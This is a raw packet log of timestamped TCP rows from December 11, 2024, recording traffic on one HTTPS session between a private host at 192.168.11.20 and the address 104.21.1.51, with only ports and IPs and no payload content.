Dec 11, 2024 12:29:32.406578064 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.406590939 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.406805038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.406805038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.406817913 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.406888008 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.407099962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.408830881 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.408843994 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.409066916 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.409066916 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.409066916 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.409080982 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.409303904 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.410471916 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.410484076 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.410712957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.410712957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.410727024 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.410734892 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.410994053 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.412574053 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.412583113 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.412755966 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.412755966 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.412810087 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.412810087 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.412818909 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.412827015 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.412986994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.414026022 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.414035082 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.414261103 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.414261103 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.414271116 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.414320946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.414453983 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.416002989 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.416013002 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.416198969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.416198969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.416263103 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.416269064 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.416362047 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.416441917 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.418148994 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.418159008 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.418385983 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.418385983 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.418395996 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.418477058 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.418657064 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.419861078 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.419869900 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.420068026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.420068026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.420078993 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.420084000 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.420164108 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.420253992 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.421648026 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.421657085 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.421889067 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.421889067 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.421899080 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.421909094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.422060013 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.423672915 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.423681974 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.423882961 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.423882961 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.423892975 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.423902988 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.424021959 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.426100016 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.426109076 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.426285982 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.426285982 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.426296949 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.426331043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.426378965 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.426462889 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.427489996 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.427499056 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.427687883 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.427687883 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.427697897 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.427735090 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.427735090 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.427844048 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.429481983 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.429490089 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.429682016 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.429682016 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.429737091 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.429745913 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.429753065 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.429753065 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.429934025 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.431772947 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.431782007 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.431969881 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.431971073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.432023048 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.432032108 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.432039022 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.432118893 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.432212114 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.433549881 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.433563948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.433752060 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.433752060 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.433763027 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.433777094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.433826923 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.433939934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.435551882 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.435560942 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.435751915 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.435751915 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.435765982 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.435765982 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.435770988 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.435851097 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.435902119 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.436973095 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.436981916 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.437197924 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.437197924 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.437210083 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.437215090 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.437215090 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.437362909 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.439295053 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.439302921 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.439507008 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.439507008 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.439517021 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.439615011 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.439718962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.441129923 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.441138029 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.441359997 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.441390991 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.441395998 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.441534042 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.443006992 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.443022013 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.443275928 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.443275928 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.443285942 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.443327904 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.443557978 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.444744110 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.444757938 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.444924116 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.444924116 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.445035934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.445045948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.445230007 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.446913004 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.446922064 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.447237968 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.447344065 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.447352886 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.447487116 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.447535038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.448728085 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.448735952 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.448962927 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.448985100 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.448990107 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.449112892 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.449223995 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.450508118 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.450515985 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.450603008 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.450848103 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.450856924 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.450943947 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.451046944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.452317953 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.452326059 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.452521086 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.452574015 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.452583075 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.452630043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.452769041 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.454838991 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.454854012 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.455091000 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.455100060 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.455142021 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.455142021 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.455249071 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.456521034 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.456528902 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.456701994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.456701994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.456710100 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.456758022 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.456851006 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.456851006 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.458307028 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.458317995 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.458472967 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.458472967 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.458492994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.458492994 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.458497047 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.458544016 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.458645105 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.460056067 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.460064888 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.460277081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.460277081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.460283041 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.460288048 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.460361958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.460421085 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.462421894 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.462430954 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.462671041 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.462671041 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.462677002 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.462682962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.462799072 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.464297056 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.464306116 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.464468002 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.464468002 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.464513063 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.464518070 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.464564085 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.464622974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.464688063 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.465826988 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.465837002 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.466017962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.466017962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.466023922 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.466094017 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.466142893 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.468184948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.468194008 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.468415022 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.468538046 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.468538046 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.468542099 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.468637943 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.468692064 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.469275951 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.469352961 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.469445944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.469445944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.469558001 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.469563961 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.469703913 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.526632071 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.532800913 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.631228924 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.631243944 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.631407976 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.631407976 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.631520033 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.631532907 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.631783962 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.632865906 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.632878065 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.633058071 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.633093119 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.633093119 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.633100033 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.633374929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.634805918 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.634819031 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.634994030 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.634994030 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.635044098 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.635051012 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.635133982 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.635237932 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.636635065 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.636647940 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.636807919 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.636807919 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.636883020 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.636883020 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.636883974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.636897087 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.637042999 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.638413906 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.638427019 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.638582945 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.638582945 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.638663054 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.638663054 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.638674974 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.638681889 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.638870001 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.640316010 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.640327930 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.640571117 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.640590906 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.640639067 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.640645027 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.640687943 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.640826941 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.640882969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.641748905 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.641766071 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.641917944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.641917944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.641927958 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.642014980 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.642065048 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.643412113 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.643420935 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.643599033 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.643599033 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.643608093 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.643620014 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.643801928 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.645304918 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.645313978 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.645473003 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.645473003 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.645524979 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.645534039 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.645569086 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.645569086 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.645739079 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.647138119 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.647161007 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.647327900 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.647327900 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.647347927 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.647353888 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.647442102 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.647528887 CET	49755	443	192.168.11.20	104.21.1.51
